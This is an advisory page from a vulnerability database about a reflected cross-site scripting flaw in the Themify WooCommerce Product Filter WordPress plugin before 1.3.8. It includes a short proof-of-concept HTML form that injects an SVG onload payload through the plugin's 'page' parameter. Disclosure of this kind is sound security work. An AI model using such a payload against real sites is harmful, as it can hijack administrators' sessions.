Lucene search

K
wpexploitUtkarsh AgrawalWPEX-ID:D106CD93-CB9B-4558-9A29-0D556FD7C9E1
HistoryMay 18, 2022 - 12:00 a.m.

Themify - WooCommerce Product Filter < 1.3.8 - Reflected Cross-Site Scripting

2022-05-1800:00:00
Utkarsh Agrawal
71

0.001 Low

EPSS

Percentile

40.3%

The plugin does not sanitise and escape the page parameter before outputting it back in an attribute in an admin page, leading to a Reflected Cross-Site Scripting

<html>
  <body>
    <form action="https://example.com/wp-admin/admin.php?page=wpf_search" method="POST">
      <input type="hidden" name="page" value='wpf_search"><svg/onload=prompt(/XSS/)>' />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

0.001 Low

EPSS

Percentile

40.3%

Related for WPEX-ID:D106CD93-CB9B-4558-9A29-0D556FD7C9E1